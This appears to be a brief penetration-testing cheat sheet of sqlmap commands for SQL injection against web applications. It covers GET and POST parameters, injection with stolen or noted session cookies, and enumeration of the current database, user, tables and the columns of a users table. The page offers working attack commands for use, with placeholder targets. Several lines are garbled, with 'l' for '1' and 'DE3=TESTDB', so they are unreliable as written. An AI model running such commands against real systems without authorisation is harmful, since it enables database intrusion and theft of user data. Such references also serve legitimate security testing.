SQLMap

GET REQUEST

./sqlmap.Py -u "http://<url>?id=1&str=val" 

POST REQUEST

./sqlmap.py -u "http://<url>" --data="id=l&str=val" 

SQL INJECTION AGAINST SPECIFIC PARAMETER WITH DE TYPE SPECIFIED

./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" -b --dbms="<mssql|mysql|oracle|postgres>" 

SQL INJECTION ON AUTHENTICATED SITE

1. Login and note cookie value (cookiel=vall, cookie2=val2) 
./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" --cookie="cookie1=val1;cookie2=val2" 

SQL INJECTION AND COLLECT MB VERSION , NAME , AND USER

./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" -b --current-db --current-user 

SQL INJECTION AND GET TABLES OF DE3=TESTDB

./sqlmap.py -u "http://<url>" --data="id=l&str=val" -p "id" --tables -D "testdb"

SQL INJECTION AND GET COLUMNS OF USER TABLE

./sqlmap.py -u "http://<url>" --data="id=1&str=val" -p "id" --columns -T "users"

Top - Home